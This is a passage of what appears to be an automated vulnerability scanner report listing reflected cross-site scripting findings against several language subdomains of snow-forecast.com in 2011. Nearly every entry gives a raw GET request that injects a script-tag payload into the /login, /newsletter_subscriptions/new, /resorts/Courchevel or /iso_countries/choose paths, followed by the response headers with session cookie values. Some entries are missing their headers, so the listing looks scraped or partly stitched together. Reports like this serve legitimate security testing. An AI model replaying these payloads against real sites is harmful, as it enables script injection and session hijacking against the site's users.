GET /login?fbd33"><script>alert(1)</script>d7988552faf=1 HTTP/1.1
Host: fr.snow-forecast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Wed, 09 Feb 2011 22:12:24 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200 OK
ETag: "8a901d5353021fa01ede1cf6b390266a"
X-Runtime: 53
Content-Length: 18278
Set-Cookie: sfcsid=048a48143f38767ee0266dc25842f948; path=/; HttpOnly
Cache-Control: private, max-age=0, must-revalidate

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
1.23. http://fr.snow-forecast.com/newsletter_subscriptions/new [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://fr.snow-forecast.com
Path: /newsletter_subscriptions/new
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 562cd"><script>alert(1)</script>ffd0d8d03f5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /newsletter_subscriptions/new?562cd"><script>alert(1)</script>ffd0d8d03f5=1 HTTP/1.1
Host: fr.snow-forecast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Wed, 09 Feb 2011 22:12:28 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200 OK
ETag: "cbe0f3fcfef66f711dd7cd43367cd8b1"
X-Runtime: 72
Content-Length: 27897
Cache-Control: private, max-age=0, must-revalidate

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
1.24. http://fr.snow-forecast.com/resorts/Courchevel [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://fr.snow-forecast.com
Path: /resorts/Courchevel
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e1cae"><script>alert(1)</script>70e3b97aaa0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /resorts/Courchevel?e1cae"><script>alert(1)</script>70e3b97aaa0=1 HTTP/1.1
Host: fr.snow-forecast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Wed, 09 Feb 2011 22:12:26 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200 OK
ETag: "c2e8b2e42b637c7ad7057468a8823269"
X-Runtime: 138
Content-Length: 42498
Set-Cookie: last_loc=135; path=/; expires=Sun, 09-Feb-2031 22:12:26 GMT
Cache-Control: private, max-age=0, must-revalidate

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
1.25. http://gr.snow-forecast.com/iso_countries/choose [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://gr.snow-forecast.com
Path: /iso_countries/choose
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be10d"><script>alert(1)</script>dc7ac305d43 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /iso_countries/choose?be10d"><script>alert(1)</script>dc7ac305d43=1 HTTP/1.1
Host: gr.snow-forecast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Wed, 09 Feb 2011 22:12:29 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200 OK
ETag: "24509b44ef0502cb5e67c94e061cc0d2"
X-Runtime: 49
Content-Length: 25341
Cache-Control: private, max-age=0, must-revalidate

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
The value of the ' request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5684"><script>alert(1)</script>4fa73c52b4 was submitted in the ' parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /login?'c5684"><script>alert(1)</script>4fa73c52b4 HTTP/1.1
Host: gr.snow-forecast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Wed, 09 Feb 2011 22:12:30 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200 OK
ETag: "bb87ec0a5f9313177002024497795958"
X-Runtime: 55
Content-Length: 19040
Set-Cookie: sfcsid=b357ac6cdfef32c035f1bb8990353f65; path=/; HttpOnly
Cache-Control: private, max-age=0, must-revalidate

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
The value of the '%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005CE)%3C/script%3E request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7ca41"><script>alert(1)</script>d077813c239 was submitted in the '%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005CE)%3C/script%3E parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /login?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005CE)%3C/script%3E7ca41"><script>alert(1)</script>d077813c239 HTTP/1.1
Host: gr.snow-forecast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Wed, 09 Feb 2011 22:12:30 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200 OK
ETag: "99663f8a46c8ee3d4cd401621cd39b65"
X-Runtime: 56
Content-Length: 20152
Set-Cookie: sfcsid=26f45e6fa4457a0a7503856d8e60c213; path=/; HttpOnly
Cache-Control: private, max-age=0, must-revalidate

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
1.28. http://gr.snow-forecast.com/login [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://gr.snow-forecast.com
Path: /login
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47337"><script>alert(1)</script>fe9cb287127 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /login?47337"><script>alert(1)</script>fe9cb287127=1 HTTP/1.1
Host: gr.snow-forecast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Wed, 09 Feb 2011 22:12:29 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200 OK
ETag: "a1944101ebe4d3de6a59a004326de0b8"
X-Runtime: 69
Content-Length: 19106
Set-Cookie: sfcsid=0111d83228f39e3db62f876165f03046; path=/; HttpOnly
Cache-Control: private, max-age=0, must-revalidate

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
1.29. http://gr.snow-forecast.com/newsletter_subscriptions/new [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://gr.snow-forecast.com
Path: /newsletter_subscriptions/new
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ff3b4"><script>alert(1)</script>8913c0754de was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /newsletter_subscriptions/new?ff3b4"><script>alert(1)</script>8913c0754de=1 HTTP/1.1
Host: gr.snow-forecast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Wed, 09 Feb 2011 22:12:30 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200 OK
ETag: "962bd9bc5c677054985264b7d769af85"
X-Runtime: 75
Content-Length: 28552
Cache-Control: private, max-age=0, must-revalidate

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
1.30. http://gr.snow-forecast.com/resorts/Courchevel [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://gr.snow-forecast.com
Path: /resorts/Courchevel
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload af16d"><script>alert(1)</script>b02a78d5cb8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /resorts/Courchevel?af16d"><script>alert(1)</script>b02a78d5cb8=1 HTTP/1.1
Host: gr.snow-forecast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Wed, 09 Feb 2011 22:12:31 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200 OK
ETag: "d93fa7940591c8af4dc97eba77265895"
X-Runtime: 123
Content-Length: 44031
Set-Cookie: last_loc=135; path=/; expires=Sun, 09-Feb-2031 22:12:31 GMT
Cache-Control: private, max-age=0, must-revalidate

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
1.31. http://hu.snow-forecast.com/iso_countries/choose [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://hu.snow-forecast.com
Path: /iso_countries/choose
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93ab1"><script>alert(1)</script>f4a7d557df6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /iso_countries/choose?93ab1"><script>alert(1)</script>f4a7d557df6=1 HTTP/1.1
Host: hu.snow-forecast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Wed, 09 Feb 2011 22:12:34 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200 OK
ETag: "93592ed0579518a2f05b25841fc04e1a"
X-Runtime: 48
Content-Length: 24265
Cache-Control: private, max-age=0, must-revalidate

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
The value of the ' request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8edf"><script>alert(1)</script>4c20355e216 was submitted in the ' parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /login?'a8edf"><script>alert(1)</script>4c20355e216 HTTP/1.1
Host: hu.snow-forecast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Wed, 09 Feb 2011 22:12:35 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200 OK
ETag: "95c512ef0c060626c695ec48f2bad3a4"
X-Runtime: 64
Content-Length: 18145
Set-Cookie: sfcsid=540c1e5ada0d391f86ca15237bf70798; path=/; HttpOnly
Cache-Control: private, max-age=0, must-revalidate

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
The value of the '%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005CE)%3C/script%3E request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86ce3"><script>alert(1)</script>addccba9450 was submitted in the '%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005CE)%3C/script%3E parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /login?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005CE)%3C/script%3E86ce3"><script>alert(1)</script>addccba9450 HTTP/1.1
Host: hu.snow-forecast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Wed, 09 Feb 2011 22:12:35 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200 OK
ETag: "9b984eb32636ca525aa609c0178ffb43"
X-Runtime: 69
Content-Length: 19270
Set-Cookie: sfcsid=4800a75d29a7a05b933b123a9fe366bd; path=/; HttpOnly
Cache-Control: private, max-age=0, must-revalidate

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
1.34. http://hu.snow-forecast.com/login [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://hu.snow-forecast.com
Path: /login
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 25758"><script>alert(1)</script>16544f37f92 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /login?25758"><script>alert(1)</script>16544f37f92=1 HTTP/1.1
Host: hu.snow-forecast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Wed, 09 Feb 2011 22:12:34 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200 OK
ETag: "43707197e671969dfb764a35b894e805"
X-Runtime: 101
Content-Length: 18201
Set-Cookie: sfcsid=a9777e1e7a843583de5a2b70946adf9e; path=/; HttpOnly
Cache-Control: private, max-age=0, must-revalidate

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
1.35. http://hu.snow-forecast.com/newsletter_subscriptions/new [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://hu.snow-forecast.com
Path: /newsletter_subscriptions/new
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 39a58"><script>alert(1)</script>703c662859d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /newsletter_subscriptions/new?39a58"><script>alert(1)</script>703c662859d=1 HTTP/1.1
Host: hu.snow-forecast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Wed, 09 Feb 2011 22:12:36 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200 OK
ETag: "e1fd2ede3bb05cfe2a27c96d98946d67"
X-Runtime: 76
Content-Length: 27719
Cache-Control: private, max-age=0, must-revalidate

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
1.36. http://hu.snow-forecast.com/resorts/Courchevel [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://hu.snow-forecast.com
Path: /resorts/Courchevel
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f75a4"><script>alert(1)</script>a36d13b9ddc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /resorts/Courchevel?f75a4"><script>alert(1)</script>a36d13b9ddc=1 HTTP/1.1
Host: hu.snow-forecast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Wed, 09 Feb 2011 22:12:39 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200 OK
ETag: "985e0b9c151a98c05d603dca43e6044e"
X-Runtime: 618
Content-Length: 42356
Set-Cookie: last_loc=135; path=/; expires=Sun, 09-Feb-2031 22:12:38 GMT
Cache-Control: private, max-age=0, must-revalidate

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
1.37. http://il.snow-forecast.com/iso_countries/choose [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://il.snow-forecast.com
Path: /iso_countries/choose
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e394"><script>alert(1)</script>a2a7132104b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /iso_countries/choose?5e394"><script>alert(1)</script>a2a7132104b=1 HTTP/1.1
Host: il.snow-forecast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Wed, 09 Feb 2011 22:12:37 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200 OK
ETag: "c5576b7f54f3d4219727fac551cf180e"
X-Runtime: 55
Content-Length: 24713
Cache-Control: private, max-age=0, must-revalidate

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
The value of the ' request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 137ae"><script>alert(1)</script>bca6a284eb0 was submitted in the ' parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /login?'137ae"><script>alert(1)</script>bca6a284eb0 HTTP/1.1
Host: il.snow-forecast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Wed, 09 Feb 2011 22:12:41 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200 OK
ETag: "18330f52cf014fecc727b0ab5c8bbbba"
X-Runtime: 53
Content-Length: 18526
Set-Cookie: sfcsid=efbea5006b3415ccf3b2e8262cc17659; path=/; HttpOnly
Cache-Control: private, max-age=0, must-revalidate

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
The value of the '%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005CE)%3C/script%3E request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e912"><script>alert(1)</script>936b987c166 was submitted in the '%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005CE)%3C/script%3E parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /login?'%22--%3E%3C/style%3E%3C/script%3E%3Cscript%3Ealert(0x0005CE)%3C/script%3E2e912"><script>alert(1)</script>936b987c166 HTTP/1.1
Host: il.snow-forecast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Wed, 09 Feb 2011 22:12:41 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200 OK
ETag: "0734137561b609824fcf1b8284ab1214"
X-Runtime: 56
Content-Length: 19606
Set-Cookie: sfcsid=394718f5d4b44901c8fb2b9fdc3bdd76; path=/; HttpOnly
Cache-Control: private, max-age=0, must-revalidate

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
1.40. http://il.snow-forecast.com/login [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://il.snow-forecast.com
Path: /login
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36f79"><script>alert(1)</script>a28f858fc0d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /login?36f79"><script>alert(1)</script>a28f858fc0d=1 HTTP/1.1
Host: il.snow-forecast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Wed, 09 Feb 2011 22:12:37 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200 OK
ETag: "beeb09a9db64fcee1f8aa2c557535b97"
X-Runtime: 233
Content-Length: 18574
Set-Cookie: sfcsid=9edf345fd458a9de0f404f5c5a5334ad; path=/; HttpOnly
Cache-Control: private, max-age=0, must-revalidate

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
1.41. http://il.snow-forecast.com/newsletter_subscriptions/new [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://il.snow-forecast.com
Path: /newsletter_subscriptions/new
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e2a72"><script>alert(1)</script>b7773d4b53 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /newsletter_subscriptions/new?e2a72"><script>alert(1)</script>b7773d4b53=1 HTTP/1.1
Host: il.snow-forecast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Wed, 09 Feb 2011 22:12:41 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200 OK
ETag: "f1065ac4774777a6fed3571cb3ca3f0d"
X-Runtime: 430
Content-Length: 28053
Cache-Control: private, max-age=0, must-revalidate

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
1.42. http://il.snow-forecast.com/resorts/Courchevel [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://il.snow-forecast.com
Path: /resorts/Courchevel
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32017"><script>alert(1)</script>354cddd340d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /resorts/Courchevel?32017"><script>alert(1)</script>354cddd340d=1 HTTP/1.1
Host: il.snow-forecast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Wed, 09 Feb 2011 22:12:39 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200 OK
ETag: "386b97ed9b468851fd164efcd5fabe0f"
X-Runtime: 136
Content-Length: 42886
Set-Cookie: last_loc=135; path=/; expires=Sun, 09-Feb-2031 22:12:39 GMT
Cache-Control: private, max-age=0, must-revalidate

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Courchevel Ski Re
...[SNIP]...
<a href="http://hu.snow-forecast.com/resorts/Courchevel?32017"><script>alert(1)</script>354cddd340d=1">
...[SNIP]...
1.43. http://it.snow-forecast.com/iso_countries/choose [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://it.snow-forecast.com
Path: /iso_countries/choose
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38500"><script>alert(1)</script>00efb245e91 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /iso_countries/choose?38500"><script>alert(1)</script>00efb245e91=1 HTTP/1.1
Host: it.snow-forecast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Wed, 09 Feb 2011 22:12:48 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200 OK
ETag: "869dfb05dab593aec3b83a7f26aca6e4"
X-Runtime: 74
Content-Length: 24359
Cache-Control: private, max-age=0, must-revalidate

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
The value of the ' request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b8c2"><script>alert(1)</script>0d95d137ec5 was submitted in the ' parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /login?'7b8c2"><script>alert(1)</script>0d95d137ec5 HTTP/1.1
Host: it.snow-forecast.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Wed, 09 Feb 2011 22:12:48 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Status: 200 OK
ETag: "dc997c74e07cc76c31817aa2fe66aa5a"
X-Runtime: 270
Content-Length: 18224
Set-Cookie: sfcsid=f319d85969b2c00da1fabd0eb8dd72c2; path=/; HttpOnly
Cache-Control: private, max-age=0, must-revalidate

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
